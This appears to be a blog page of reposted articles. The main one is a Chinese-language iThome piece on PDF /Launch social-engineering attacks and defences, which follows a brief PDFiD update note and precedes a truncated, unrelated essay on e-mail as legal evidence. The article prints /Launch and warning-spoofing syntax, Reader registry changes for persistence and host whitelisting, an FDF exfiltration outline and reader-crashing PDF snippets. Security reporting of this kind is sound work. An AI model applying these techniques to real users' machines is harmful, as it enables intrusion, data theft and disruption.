Update: PDFiD Version 0.0.11 to Detect /Launch

Now that malicious PDFs using the /Launch action become more prevalent, I release a new PDFiD version to detect (and disarm) the /Launch action.







轉自Didier Stevens

小心!PDF也會藏毒

小心!PDF也會藏毒

不明來路的執行檔案連結不能點,這已經是很多人都擁有的資安常識。不過你是否也知道,PDF也有可能成為攻擊手法的一種?
不明來路的執行檔案連結不能點,這已經是很多人都擁有的資安常識。不過你是否也知道,PDF也有可能成為攻 擊手法的一種?不光如此,最近更有資安研究員展示了不用利用PDF Reader軟體漏洞,就能以社交工程和PDF檔案原本允許的功能,誘騙使用者連上惡意網站或執行惡意程式的手法。


最近,兩位資安研究員,相繼發現了不需要透過漏洞,就能利用PDF原本的功能,進行惡意攻擊的手法,並且公開將過程展示在Youtube上。事實上,透過 PDF這一類文件檔案進行的攻擊手法,已經越來越普遍,這也使得這兩位研究員的發現,掀起了一股風波。

在臺灣,每年行政院國家資通安全會報都會進行「電子郵件社交工程演練」,針對各個機關發送社交工程攻擊手法的模擬攻擊電子郵件,假冒各個不同單位發信,測 試看看有多少人會無預警的打開郵件裡的連結或附檔。以2007年12月的結果來看,平均24.17%的使用者會打開郵件;16.29%的使用者會進一步打 開連結或附件。其中,詐騙成功率最高的,是以夾帶惡意文件檔的方式誘騙使用者點擊。測試中,每年都有5~8%的使用者會打開這樣類型的惡意文件檔案。

與社交工程手法混用,惡意文件檔成為有效攻擊手法
傳統來路不明的執行檔和連結,誘騙使用者點擊的攻擊手法,已經逐漸不那麼有效了;但是文件檔,如PDF、Office文件等,則反而成為了新的可利用手法

不需漏洞,攻擊者也可以透過PDF讓使用者執行程式
透過在PDF檔案中寫入/Launch指令的手法,可以讓使用者只要執行特定的PDF檔案,連帶就自動執行其他任何程式

不要高估PDF的安全性
目前看來,唯一能夠阻止這種手法的防範之道,只有透過偏好設定裡的信任管理程式,把允許使用外部應用程式開啟非PDF檔案附件的選項關掉

社交工程結合惡意文件防不勝防
幾位國外的資安研究員公開展示了不用透過漏洞,直接以社交工程與惡意文件檔案結合的方式,執行惡意程式的手法

可能的攻擊手法
一為先變更Reader的設定,再竊取資料;二為可能透過PDF做DDoS或破壞性的攻擊

防堵PDF文件攻擊的4大方法
雖然目前還沒有完全能夠百分之百防護的有效方法,不過對於企業或組織來說,還是有4個方法可以參考使用,多管齊下降低危險性




與社交工程手法混用,惡意文件檔成為有效攻擊手法

上述的數字,隱約透露了一個事實,隨著一般使用者的資安意識逐 漸升高,傳統來路不明的執行檔和連結,誘騙使用者點擊的攻擊手法,已經逐漸不那麼有效了;但是文件檔,如PDF、Office文件等,則反而成為了新的可 利用手法,如果搭配社交工程的手法,偽裝成使用者認識的寄件者單位或人員,成功率就更高了。



一般來說,透過文件檔達成的攻擊,主要有兩種,一種是利用軟體的漏洞,如透過緩衝區溢位等手法,遠端取得使用者電腦的存取權利,然後植入惡意程式。另外一 種,則是透過文件中夾帶的JavaScript,自動引導使用者連線到惡意的網站,下載惡意程式。

這些手法都不是新的手法,不過令人意外的,卻非常有效。趨勢科技技術支援部經理簡勝財就表示,這種透過文件檔打入組織內部的攻擊手法,在臺灣非常普遍,目 前很多針對特定目標發動攻擊的駭客,甚至是針對政府機關攻擊的「網軍」,常常都會利用這樣的手法,先調查內部人員的資訊,然後偽裝成相關的人員,發送惡意 的文件檔,誘使使用者點擊。由於一般使用者對於文件類型檔案的戒心較低,這樣的手法成功率很高。「我們有不少客戶都有遇過類似的手法,這種搭配社交工程的 手段,已經牽涉到使用者的行為,是目前最難防禦的威脅。」簡勝財說。

不過當然軟體廠商也不會坐以待斃,隨著軟體廠商的持續更新,許多文件檔可以利用的漏洞也逐一的被修補。例如過去多個微軟Office軟體可以被利用的緩衝 區溢位漏洞,就已經幾乎都被修補,隨著新版軟體的推出,安全性也隨之升高;PDF檔案也是類似的狀況,Adobe和Foxit等PDF Reader軟體的廠商,也持續的修補漏洞,解決類似問題。使用者也可以透過關閉執行JavaScript等功能,確保安全。

看起來只要持續更新,似乎受到惡意文件檔攻擊的安全威脅風險已經減低不少。但是最新的PDF檔案攻擊手法,卻戳破了這個幻夢。


看大圖



不需漏洞,攻擊者也可以透過PDF讓使用者執行程式

3月底,資安研究員Dider Stevens證實了,透過在PDF檔案中寫入/Launch指令的手法,可以讓使用者只要執行特定的PDF檔案,連帶就自動執行其他任何程式。 Dider Stevens甚至提供一個PDF檔案下載,證實只要點選了插入特定指令的PDF檔案,就可以自動執行cmd.exe。雖然部分PDF 閱讀軟體會跳出警告視窗,可是Dider Stevens指出,由於PDF的檔案格式也允許更改警告視窗內的提示文字,這使得透過社交工程的手法,在提示文字上做一些手腳,就可以欺騙使用者執行攻 擊者想要執行的檔案。

由於Dider Stevens展示的這個手法,是PDF合法允許的指令延伸,其寫法如下:
/OpenAction <<
/F <>
/S /Launch
>>


而更改警告視窗的寫法,也是合法的範圍,只要加上類似:(app.alert("提示文字內容"))的這個字串,在「提示文字內容」的地方,填入想要填入 的內容,就能隨意改變警告視窗的內文。在這樣的狀況下,透過這種欺騙手法進行攻擊的可能性,就和過往任何利用程式漏洞的手法不同,不僅合法(這代表著防毒 軟體和更新都無法阻擋),對於一般使用者來說,警覺心如果不夠強,很容易就會中招。

4月初,這個手法又被另一位資安研究人員Jeremy Conway利用,發展出一套透過這樣手法進行擴散感染的方式。使用者只要打開惡意PDF檔案,就會讓正常的PDF檔案被植入特定的指令,進而如果又有其 他人打開被植入指令的檔案時,就會自動連結到特定網站,下載惡意程式。而這一切的動作,都不是利用漏洞,而是利用PDF本身就具備的功能。

Jeremy Conway雖然沒有公布他所利用的指令寫法,不過透過他的概念驗證,已經證明了透過「Launch」這樣的指令搭配OpenAction的功能,可以在 完全合法的行為模式下,讓惡意攻擊者達成目的。



不要高估PDF的安全性

http://www.ithome.com.tw/img/121/60768_1_4_l.jpg

為了因應這樣的手法,原本對於呼叫不會有警告的Foxit Reader,很快速的就發表了更新,現在Adobe Reader和Foxit Reader在自動執行其他程式時,都會跳出警告框。不過正如前面說到,這也能透過社交工程去動手腳,欺騙使用者。目前看來,唯一能夠阻止這種手法的防範 之道,只有透過偏好設定裡的信任管理程式,把允許使用外部應用程式開啟非PDF檔案附件的選項關掉。

不過對於企業內部的資訊人員來說,要確實要求每個使用者遵循,這會是一個難題。就這個角度來看,目前這種以合法程序去驅動的惡意攻擊手法,幾乎沒有任何方 式可以徹底根絕。只有透過教育訓練去提升員工在使用上的資安意識。這種融合社交工程的手法,是目前最難防禦的攻擊方式。

大家必須體認到,PDF事實上並不是一種非常安全的文件格式。這起源於PDF實在有太多的互動能力,舉例來說,除了Launch指令之外,還有GoTo、 Thread、URI、Sound、Movie、Hide、Named、Set-OCG-Stage、Rendition、Transition、Go- To-3D、JavaScript等各種不同的互動指令,可以讓使用者在打開文件時,就自動執行不同的動作。也正由於擁有這麼多互動的能力,這使得每隔一 陣子,就會聽到利用PDF的新攻擊手法。比如說JavaScript的指令,就會被利用來讓使用者外連到惡意網站。

更糟糕的是,因為PDF閱讀軟體的很多設定,是可以透過修改一些電腦上的機碼達到的。比如說,在Windows系統下,如果使用Adobe的 Reader,透過修改「HKCU\Software\Adobe\ Acrobat Reader」、「HKLM\SOFTWARE\Policies\Adobe\Acrobat」、「Reader\FeatureLockDown」、 「%APPDATA%\Adobe\Acrobat」等位置的資料,就可以更改一些PDF的設定,像是一些擴充功能與外連網頁的白名單和黑名單,這都使得 統一管理上有一定難度。舉例來說,如果在HKCU中可以設定的連線白名單中加入「http://」,那麼所有透過PDF外連出去的動作,都將不會出現警 告。

至截稿前,Adobe方面都還沒有針對這樣的手法做任何的修補,據了解,Adobe方面也沒有任何移除PDF閱讀軟體上執行JavaScript的功 能,Adobe雖然在4月13日更新修補多個漏洞,但是這些修補和Jeremy Conway等人公布的手法無關。

由上述可知,此類手法目前看來還會是企業內部很大的風險,而且沒有明確的可防禦方法。資安研究人員Jeremy Conway在示範他的手法時就公開表示,他相信目前多數的企業仍然對於這樣的手法沒有做任何的防禦準備。「這很有可能會變成未來大規模攻擊者可利用的手 段。」Jeremy Conway說。企業內部的IT人員,在軟體廠商還沒有針對這些手法做出回應之前,其實應該要開始考量到這個層面的安全,並且設法做出一些管理機制上的因 應。


社交工程結合惡意文件防不勝防

3月底,Dider Stevens展示了如何在不使用PDF Reader的漏洞下,配合社交工程,誘騙使用者開啟惡意程式的手法。

這樣的手法,主要是建基在PDF Reader的Launch指令,它可以自動開啟其他應用程式的延伸功能,是PDF Reader合法的功能。從Dider Stevens的展示中可以看到,使用者打開一個看似正常的PDF檔案,之後雖然會跳出警告方塊,警告使用PDF檔案即將開啟一個新的應用,不過攻擊者可 以透過社交工程的欺騙手法,改寫警告方塊中的內容,藉此欺騙使用者點選開啟。以Dider Stevens的展示為例,他就把內容改為「To view the encrypted message in this PDF document, select "Do not show this message again" and click the Open button.」在展示中,只要點選開啟,就會自動跳出cmd.exe的命令執行視窗,這也代表其實透過這樣的手法,攻擊者可以執行任何一種應用。


看大圖

/Launch的手法其實背後最重要的是社交工程的應用
前面已經談到了,要使用這個手法,其實插入的程式寫法並不複雜,只需要寫入:
/OpenAction <<
/F <>
/S /Launch
>>


然後改寫警告方塊的內容,也只需要以(app.alert("提示文字內容"))這樣的方式就能達成,以技術來說,基本的作法並不困難。但是重點在於這樣 的攻擊方式,如果是在攻擊者已經事先收集一定資料,並且針對組織特定單位或人員發動,卻讓人難以防禦。

這其實正是社交工程攻擊手法的重點,其實目前社交工程的手法已經成為攻擊者最熱愛的攻擊方式,這些手法普遍來說技術門檻都不高,並且都能造成大量的連鎖攻 擊,如果攻擊者事前有針對攻擊的對象和組織做一定的調查,社交工程的手法甚至會讓使用者難以察覺,使用者還有可能在不知不覺中成為協助攻擊者的小幫手。

一般來說,這樣的手法幾乎都是用在針對性的攻擊上居多,攻擊者會事先收集目標組織的資訊,然後再偽裝成組織內部的人員,以發信、傳送檔案等方式,在社交工 程的掩護下,傳送敲開大門的惡意程式給特定對象。以前述的手法來說,就是PDF檔案。

當使用者在不知情的狀況下執行的PDF檔案,可能就會連帶的執行了惡意程式,或是連結到特定的網站下載檔案,讓攻擊者取得使用者電腦的控制權,並且能夠側 錄更多資訊。最後,攻擊者會利用被取得控制權的電腦使用者名義,再度以社交工程的方式掩護,發送惡意程式,取得其他電腦的控制權。

這也是為什麼社交工程的手法成為現在最難以防範的攻擊方式,因為最早受害的使用者,往往就在不知情的狀況下成為攻擊者的助力或跳板,甚至主動協助攻擊者傳 送含有惡意程式的檔案。

4月初,另一位資安研究人員Jeremy Conway所展示的手法,就讓Dider Stevens的手法獲得更近一步的驗證,Jeremy Conway證明了,攻擊者不僅可以在合法的狀況下利用/Launch的功能,透過社交工程的掩護,讓使用者在不知情的狀況下執行惡意程式或連線,還可以 進一步以類似的方式,讓原本同一臺電腦上健康的文件,也被植入自動開啟動作的指令描述,並且讓使用者自動連線到特定的網站。

資安研究員Jeremy Conway 在Youtube 上展示其手法時的影片, 網址為
http://www.youtube.com/watch?v=QNxJTt4vOT0&f
eature=player_embedded


過去透過PDF這樣的文件檔案,迫使使用者在不知情的狀況下自動連線到惡意網站的手法,往往都必須透過檔案夾帶的JavaScript來連結外部網站。這 樣的攻擊手法只要使用者關閉了PDF Reader的JavaScript功能,就無法成功達成。

但是在Jeremy Conway的展示中,即便使用者使用的Adobe Reader關閉了JavaScript執行的選項,攻擊者卻還是能夠透過類似Dider Stevens所展示的手法,讓原本健康正常的PDF檔案,被植入自動執行連線到惡意網站的指令敘述,之後打開原本健康的PDF檔案,就變成會自動連線到 攻擊者指定的網站,即使在JavaScript執行的選項被關閉的狀況下。

Jeremy Conway的展示,代表著使用者只要打開過一次惡意的PDF檔案,其他健康的PDF檔案也有可能受到影響。這也讓這樣利用社交工程和PDF原本合法功能 的手法,變成有了大規模散布和攻擊的可能性。如果說Dider Stevens展示的手法,是示範了一般社交工程攻擊的前段(敲開大門),那麼Jeremy Conway所展示的手法,則是完成了後段(擴大攻擊範圍)。而且最重要的,兩者所展示的手法,都不需要利用程式的漏洞,完全在合法的範圍內進行。這使得 防毒軟體不可能阻擋這樣的連線,而如果沒有使用類似網站名譽資料庫功能的閘道器設備,攻擊者很有可能就在無聲無息的狀況下,完成了植入惡意程式的動作,而 起因,只是使用者打開了一個他原本以為是某個認識的同事寄來的PDF檔案。


可能的攻擊手法

可能攻擊手法:先變更Reader的設定,再竊取資料

上述的手法,都還只是整套攻擊中的幾個環節而已。正所謂知己知彼,百戰百勝;為了能夠防範可能利用PDF發動的攻擊,我們可以把上述的手法套用在過去攻擊 者常用的攻擊模式上,並且進一步推論出其可能的做法細節。

首先,透過上述的手法先敲開使用者的大門後,除了植入木馬等惡意程式外,攻擊者為了讓之後的擴大破壞和感染範圍能夠更順利,取得控制權後,可以先想辦法變 更使用者端的PDF Reader設定,如此一來,就算禍源PDF檔案被找到了,植入的程式被清除了,未來還是有機會可以利用類似的手法進入使用者的電腦。

由於Reader軟體的設定,通常都可以在本機端作設定,所以這讓攻擊者可以在不受到組織內管理者的干擾下,去做這些設定的更改。以下就以最多人使用的 Adobe Reader為例。需要更改的設定會分幾個重點進行,首先先把Reader的JavaScript全域變數功能打開,將 JSPrefs/bEnableGlobalSecurity的參數改為0;透過這樣的做法,就能夠讓攻擊者自由的使用JavaScript全域變數來開 啟或關閉JavaScript,達到控制PDF外連網站的效果。

再來就是更改PDF Reader中連線網站白名單的設定,透過將TrustManager/cDefaultLaunchURLPerms/tHostPerms 的值改變,設定特定的網站位址為白名單,例如將ithome.com.tw位址加入,就能讓PDF檔案在連線到此一位址時,不會再跳出警告。

然後對於攻擊者來說,為了未來透過PDF Reader開啟一些未經允許附加延伸檔案指令方便,可以修改Attachments/cUserLaunchAttachmentPerms /iUnlistedAttachmentTypePerm的值,將之設定為2,這將讓攻擊者能夠方便的重複透過惡意的PDF入侵此一使用者的電腦,而讓 他渾然不知。

之後,攻擊者還能再進一步取得與開啟JavaScript的使用權限與功能,只要能夠透過PDF使用JavaScript,不光是重複入侵的機會提高很 多,攻擊者也更容易透過JavaScript執行一些動作,盜取資訊。

透過這些設定的更改,攻擊者現在如果要盜取這臺電腦上的PDF文件,就可以透過執行JavaScript的方式,將所有使用打開過的PDF文件變成 Adobe文件共通的FDF格式,因為FDF占用的空間通常較小,所以能在占用比較小頻寬的狀況下,往外傳輸到前述設定好的白名單伺服器位址上。這些動作 只要透過PDF原本的ImportData、SubmitForm的指令,就可以完成,並且還能隱藏在背後,將轉好的FDF檔案儲存在暫存區或隱藏的檔案 夾,等待每次Reader開啟時再將資料傳出去。而這些動作都是透過PDF的Reader軟體完成,所以除非組織內有行為模式分析的設備,否則將難以發現 異常。

也有可能透過PDF做DDoS或破壞性的攻擊
看完了可能的竊取資料與攻擊模式後,其實PDF還有其他可能造成的威脅,如針對單機癱瘓式的DDoS,或是單純破壞的攻擊。不過這種做法和現在一般攻擊者 想要隱身在背後的模式較不符合,使用的可能性較低。

這些攻擊方式多數都是利用改寫PDF中物件的數值達成。舉例來說,透過改寫PDF檔案中物件的長度,如:
4 0 obj
<<
/Filter /FlateDecode
/Length 486003
>>
stream
(此處填入數值)
endstream
endobj


透過將長度改寫為486003位數,然後在stream的部分填上許多、許多的0,這樣就能夠造成PDF執行的癱瘓。

此外,透過執行Named、GoTo這樣的函式,也能造成PDF Reader的癱瘓,例如不停的換頁、開啟新頁面,或是隨機亂跳等,進而導致整臺電腦當機。這些動作可以配合AA(Additional Action)這樣的寫法,難度其實並不高。例如:
1656 0 obj
<<
/AA <<
/O <<
/S /GoTo
/D [1 0 R /Fit ]
>>
>>


多插入幾個這樣的寫法就能夠利用GoTo去做到PDF頁面隨機亂跳的效果。
又或者使用像這樣的寫法:
/AA <<
/O <<
/S /GoToR
/F (gotor-2.pdf)
/D [0 /Fit ]
/NewWindow false
>>
>>

/AA <<
/O <<
/S /GoToR
/F (gotor-1.pdf)
/D [0 /Fit ]
/NewWindow false
>>
>>


透過在不同文件中,如gotor-1.pdf放入第一串程式碼,在gotor-2.pdf放入第二串,就可以造成利用GoToR指令重複開啟不同文件,並 且還可以設定在新視窗開啟,最終造成電腦負荷過大而導致當機。

不過終究來說,這些方式都太過直接破壞性,太容易被發現,受害範圍有限,並且對攻擊者來說又不能獲得利益,這類的手法已經越來越少見。

總而言之,PDF由於與不同應用互動的能力強,要透過PDF進行攻擊,或做為攻擊手段的可能性,也就越來越高。尤其先前提到的由Dider Stevens和Jeremy Conway所展示的一連串手法,都使得PDF這樣文件檔案格式的安全性,再次受到考驗。

目前兩位研究員提出的手法,Adobe還沒有一個正式的解法可以解決這個問題,Foxit則是以緊急更新來增加了警告的方塊,不過根本上還是沒有解決這個 問題。也就是說,此類利用PDF和社交工程進行入侵的攻擊手段,目前還是無解法的。

不過企業還是可以先從管理的手段改善開始做起,首要之務就是教育使用者對於不明檔案的危險性必須有一定的認識。尤其很多一般使用者對於PDF這樣的文件檔 案,總是認為比執行檔來得安全,這樣的觀念其實已經落伍,除了時時讓軟體保持更新之外,為了避免受到前述PDF檔案與社交工程手法的攻擊,從使用習慣上開 始教育,會是各個企業和組織的當務之急。而從治標的方法來說,先想辦法關閉PDF閱讀軟體中開啟JavaScript和第三方應用程式的選項。不過對於企 業的IT管理者來說,要確實做到這一點,也是一個很困難的目標。但由於目前最被廣泛使用的Adobe,還沒有針對由Dider Stevens和Jeremy Conway所展示的一連串手法,做出任何針對性的更新。短期內也不會移除JavaScript的功能。也因此,企業或組織內的IT人員,有必要開始考慮 使用這些治標的方法,減少使用者因而中招的風險。

惡意 PDF檔案在正常檔案中植入自動連線的程式碼
 
 1  這個示範和先前同 樣,只需要利用到PDF 檔案允許的/Launch功能。

 2  可以看見PDF Reader並沒有開啟JavaScript的功能,這證明了和過去以JavaScript 的方式,讓使用者在開啟檔案的時候自動連線到惡意網站的手法不同。


 3  點選事先受到攻擊者加工的惡意PDF 檔案,和先前的展示相同,這邊透過社交工程的手法,改寫警告的文字框,誘騙使用者點選開啟。


 4  這時候重新點選原本健康的PDF 檔案,竟然也出現了要執行其他動作的警告框,同樣也以社交工程方式改寫內容,讓使用者點選Open。這時候原本健康的PDF檔案,已經被惡意的PDF 檔案給植入了自動執行動作的程式碼。


 5  按下Open後,就會自動連結到特定的網站。這整 個過程中都沒有運用JavaScript和惡意程式,全部在PDF的允許功能內運作,這使得傳統防毒軟體毫無用武之地。但是連到特定的網站同時,就有可能 可以隨機植入木馬或其他惡意程式。



防堵PDF文件攻擊的4大方法


前面談到了PDF文件的各種攻擊模式與危險,也指出了目前還沒有完善的對應之道。不過,當然像任何資安問題一樣,企業或組織在面對這樣的問題時,還是有幾 種能夠減輕遭受攻擊風險的做法,在這裡,我們就將列舉4種可行的相應辦法,供讀者參考。
方法1 建立管理稽核制度與教育訓練
可疑的文件和超鏈結不能開,這是長期以來就被告知的資安常識,多數的使用者也有一定的認識。不過,相較於連結和執行檔,對於PDF這一類的文件,還是有很 多使用者都會認為開啟的風險較低。

要解決這個問題,就必須透過一定程度的教育訓練才能做到。由於PDF這一類文件攻擊的方式,多半隨著社交工程的手法一起使用,而面對社交工程的攻擊手法, 最重要的就是從改變人的行為開始。只有讓使用者體認到危險性,對PDF文件檔案隨意開啟的習慣才能夠被改變。

舉例來說,每年國家資通訊會報針對不同機關進行的社交安全模擬演練,可能就是建立這種認識的好方法。透過這種演習的方式,統計不同單位有多少人會去點選可 疑的連結或檔案,其結果將能夠進一步帶動使用者的資安意識。

不光是政府單位能夠這樣做,其實稍具規模的組織或企業,也可以以類似的方法進行自我檢驗。例如不少大學就已經開始自己進行類似的社交工程模擬攻擊檢測。

不管怎麼說,防堵這種手法的關鍵,還是在於使用者的認知教育與組織的管理稽核制度。如果企業或組織能夠透過資訊單位要求使用者做一些基本的保護措施,如關 閉電子郵件自動下載圖片與內容的功能、要求設定以純文字開啟信件、取消信件預覽等,並且要求使用者確認來信的人員的真偽之後才開啟相關文件等,這些都能協 助企業在一定的範圍內,減輕受到攻擊的風險。

多數的資安專家都表示,面對社交工程的攻擊手法,其實最重要的還是在於使用者的行為。而使用者的行為,其實就和企業管理的制度與使用者的教育息息相關。也 因此,透過上述的設定,和類似演習與管理上的規定,雖然說起來稍嫌空洞,不過這正是根本面對此一問題的方法。
方法2 從相關設定下手
除了教育訓練與管理制度的建立之外,要求每個使用者的電腦都做出較安全的設定,也是一個方法。

以PDF檔案來說,首先要把PDF Reader的JavaScript和開啟第三方應用程式的功能都關閉。舉例來說,如果使用的是Adobe Reader,就要到偏好設定中,選擇JavaScript,然後把啟用Acrobat JavaScript的選項關閉。而第三方應用的部分,則同樣要到偏好設定,選擇信任管理程式,然後關閉允許使用外部應用程式開啟非PDF檔案附件的選 項。如此一來就能避免攻擊者透過JavaScript,或是前述兩位資安研究員所示範的/Launch自動執行動作手法,減少風險。

當然這樣的方法依然只是治標不治本,不過短期內可能會是最有效的方法。只是這等於必須要關閉部份PDF Reader的功能,對於常常使用PDF檔案的使用者來說,如果有這些功能的需求,一時之間IT人員也許很難說服他們改變習慣。

另外就是,由於這些設定很有可能必須逐臺去變更,由於PDF Reader目前在統一管理設定的方面上還十分不足,在稍大規模的企業或組織內,如果有太多的電腦,逐臺設定會成為一項麻煩且不可能的任務。這使得實際執 行上,這樣的做法可能必須要使用者的配合,否則會等於沒有做。

對於IT人員來說,在Adobe或其他PDF Reader的軟體廠商提供更完善的更新去避免類似的攻擊手法前,這種改變相關設定的方式,或許還是面對多數較無資訊觀念的使用者時,最有效的做法。不過 長期來看,還是必須搭配管理制度與教育訓練,才能確保長治久安,確保安全。

將「允許使用外部應用程式開啟非PDF 檔案附件」的功能選項關閉,就能避免透過/Launch的手法進行惡意攻擊的可能性。
方法3 改變開啟和傳送PDF檔案的方式
資訊安全有一個目前還沒有被推翻的定律,那就是越多人使用的軟體和方法,越不安全。因為攻擊者通常都會針對這樣的目標去想方設法,找出漏洞。

所以如果使用者端改變,使用較少人使用的方法或軟體,很多時候就往往會避開許多危險。以PDF為例,前述展示的手法,對於幾個比較多人使用的Reader 軟體,都有影響;但是相對的比較少人使用的PDF Reader軟體,則反而可以避開這些危險。像SumatraPDF這種陽春且沒什麼多餘功能的PDF Reader軟體,反而就不會有/Launch這種攻擊模式的風險。

除此之外,透過Google等網路廠商提供的Web服務來開啟PDF檔案,或許也是個好主意。因為不是在本地主機端執行,可以避開一些無謂的風險。但是對 於企業來說,這樣的做法可能是緣木求魚,幾乎一般使用者是不可能以這樣的方法來開啟PDF檔案的。

所以也會有人建議,只使用Office文件的檔案,或是規定以壓縮的方式,或是一定的命名方式來傳遞文件,減少一些接收到不明文件的風險。這些方法或多或 少都會增加使用者的不便,但使用冷門的PDF Reader軟體,如果使用者能夠接受,事實上也不乏是解決之道的一種可能。

不過要注意的是,即便使用冷門的PDF Reader,也不見得就一定高枕無憂。舉例來說,即便使用Preview(Mac OS)或poppler,還是有針對其作業系統或PDF Reader設計的攻擊模式。如果攻擊者是事先調查過的針對性社交工程攻擊,很有可能還是會透過PDF檔案攻擊成功。也就是說,還是必須輔以不同的方式才 能解決這個問題。當然透過Web服務來開啟目前看來是比較有用的方式,但是就實際企業與組織的營運方面來看,使用上還是有一點難度。

透過在PDF 的格式中加入(app.alert("提示文字內容"))這樣的語法,就能夠改寫開啟PDF檔案時,跳出的警告視窗文字,進而以社交工程的方式誘騙使用者 開啟。。
方法4 從閘道端下手,封鎖可疑連線
說了這麼多電腦主機端的防護,當然從閘道端下手,也是有一定的用處。舉例來說,透過能夠阻斷可疑網站連線的設備,如IPS或Web安全閘道器等,就能夠減 少受到PDF攻擊的電腦,又再度將資料外連洩漏出去的可能性。

據了解,不少防毒和防火牆的閘道器廠商,現在也正投入過濾可疑文件的功能研發。類似這樣的功能也能夠有效的減少PDF等夾帶惡意文件信件進到使用者端的收 件夾,直接在閘道端封阻,減少安全風險。

趨勢科技技術支援部經理簡勝財就表示,目前趨勢科技就準備在防毒引擎中加入這一類的功能,希望能夠透過辨識的能力,分析出含有惡意行為的PDF或其他類型 文件檔案,從閘道端阻檔這樣的電子郵件,減少使用者中招的機會。「其實不少曾經吃過類似虧的使用者,已經開始協助我們測試類似的功能。當然不可能百分百防 禦,但是未來這樣的功能應該能夠減輕類似的安全風險。」簡勝財說。

其實無論如何,資安的問題永遠不可能是靠單一的方法就能夠解決的。資訊安全不像是築堤防,比較像是不停的把水掃出去,永遠都有不同的環節需要注意,是一個 動態的過程。所以對於企業來說,要減少利用PDF檔案攻擊的風險,還是必須從各個角度下手,才有可能做到確保一定程度的安全。

從網路設備的角度來看,其實Web防火牆、Proxy Server等有能力過濾使用者連網的設備,其實在協助防禦這樣的攻擊上,還是能夠做到一定的效果。



轉自ITHOME

電子郵件(E-mail)證據問題研究

  電子郵件(E-mail)是通過Internet或者Intranet等網路,從終端機輸入檔、圖片或者聲音等,通過郵件伺服器傳送到另一端的終端機上的資訊。

電子郵件是目前人們在虛擬的網路空間中使用頻率最高的通訊方法。隨著Internet的飛速發展,這種以電子郵件通信方式一旦發生糾紛,其是否能夠成為證據、成為證據的條件是什麼、是訴訟中如何取證,是亟待解決的問題。

  一、電子郵件能否作為證據

  電子郵件能否作為證據,我國目前尚無規定,但電子郵件已被現代經濟社會所接受卻是現實。電子商務、電子教育、電子政府等是現代資訊社會的產物。《合同法》第十一條“書面形式是指合同書、信件和資料電文(包括電報、電傳、傳真、電子資料交換和電子郵件)等可以有形地表現所載內容的形式。” 電子郵件已列為書面合同的一種形式。合同的雙方通過電子郵件來達成,來實現購買行為。其購買、結算、質疑、退貨、索賠等均是通過電子郵件來實現的。如今,網上訂票、網上掛號、網上諮詢已實際進入我們的生活。由此可見,如在涉及於此的訴訟中,負有舉證義務的當事人必然會將雙方往來的電子郵件作為證據提交到法庭,以支持自己的主張。這就為電子郵件可以成為證據提供了現實的可能性和必要性。

  但是,在我國的訴訟法中,被承認的證據有“物證、書證、證人證言、當事人(被告人)陳述、犯罪嫌疑人、被告人供述和辯解、鑒定結論、勘驗、檢查筆錄”等七種。並未包含有電子郵件,而作為訴訟中的證據,其形式首先必須合法,即證據應是在法律所規定的證據範圍之內,之所以這樣,是為了保證訴訟程式的公正、合法、有效。但筆者認為,不論何種形式的證據,都必須符合兩個基本特徵:1、是它確實是存在的事實,而非猜測和虛假的東西;2、是它與案件事實有著客觀聯繫。在訴訟法中,雖對證據形式有所規定,但隨著客觀世界的發展、科技的進步,證據形式也在不斷發生變化,如在1980年的《刑事訴訟法》中並未將視聽資料作為證據,但在司法實踐中,司法機關並不排斥這種證據。而是將其作為書證或物證看待,在1996年的新刑訴法中,即將其列為一種獨立的證據類型。同樣電子郵件作為一種新的通信方式,如僅僅因為其未被列入證據種類,而簡單地否定其證據效力,既脫離實際,又不利於查明案件事實。筆者認為我國合同法把電子郵件作為書證的一種不夠準確。第一,書證的載體通常是紙張,使用設備較為簡單,而電子郵件的載體是的數位化設備,使用設備較為複雜。第二,書證表現方式一目了然,直接表現,容易保存,電子郵件需專門的數位處理設備讀取後用顯示設備表現出來,不容易保存。第三,書證被複製,修改後易被技術鑒定出來,電子郵件無法證明是否被複製、改動,因為它被修改後無痕跡可查。因此,不易用我國傳統理論對證據種類的劃分,應將電子郵件作為一種新的證據種類。

  從當前國際發展情況看,聯邦德國在1997年通過了世界上第一部全面規範Internet的法律棗“多媒體法”(德文簡稱IUKDG),其中即有對電子郵件的規範。美國在發生了大量的電子郵件侵權糾紛後,聯邦政府也正在積極推進制裁所謂“垃圾郵件”的立法活動。其各州政府開始對電子郵件侵權糾紛進行審判,如1997年11月德克薩斯州的TRAVIS郡審理的flowers.com E-mail侵權案中,電子郵件既作為直接證據被法庭確認,並據此判決賠償。更有甚者,在1998年華盛頓州檢察長亦以同樣的事由和證據,對電子郵件侵權者提起了刑事起訴。所以,不論是從與國際發展同步,還是從適應高科技對現代生活的影響而言,對於電子郵件均不宜採取只因證據形式不合法,而否認其效力的做法。

  二、電子郵件成為證據的條件以及認定

  電子郵件與傳統的通信方式最大的區別在於,它把人們所要表達的意思轉化為數位信號,並通過網路傳輸呈現在對方的電腦螢幕上,因此互無“真跡”,充其量也只是在自己電腦上的列印件,而一經發件人從其“發件箱”、“回收站”中將檔刪除,便不見蹤影,而電腦列印件的易於偽造或刪改的特性,而又不能不使人們對其疑慮有加,故電子郵件成為證據的條件應相對嚴格。

  在審查電子郵件的證據效力時,首先應對電子郵件的特徵有所瞭解。電子郵件的最大特點是每個電子信箱均對應一個唯一的註冊用戶(它可能是一個人,也可能是一些人),其用戶名、帳戶名、密碼均是唯一的。任何人只要掌握了某一註冊用戶的用戶名、密碼,就可在任何地方,使用任意一台聯網的電腦在該用戶名所對應的電子信箱上收發、刪除電子郵件。電子郵件還有一個特點是傳輸過程的複雜性,尤其是跨國界傳遞的郵件要輾轉經過多個伺服器才能到達目標伺服器。在實踐中,直接由電子郵件引發的糾紛尚不多見,其一般是以證據的形式出現,在以證據形式出現時,如果雙方均對電子郵件的內容及收發人無異議,在訴訟中接受雙方當事人的質證,認為可以作為證據認定,在此類情況下,電子郵件的證據形式已不重要,因當事人的承認性陳述本身就可以作為證據認定,而這種承認性陳述又可被電子郵件的內容所印證,所以,應當被法庭認定。

  如果雙方在訴訟中對電子郵件有爭議,不論是由電子郵件直接引發的糾紛還是以證據的形式出現的電子郵件,只要其涉及當事人的切身利益及關鍵問題的確定,即會引發爭執,主要表現以下幾種情況。

  1.對收發件人的認定

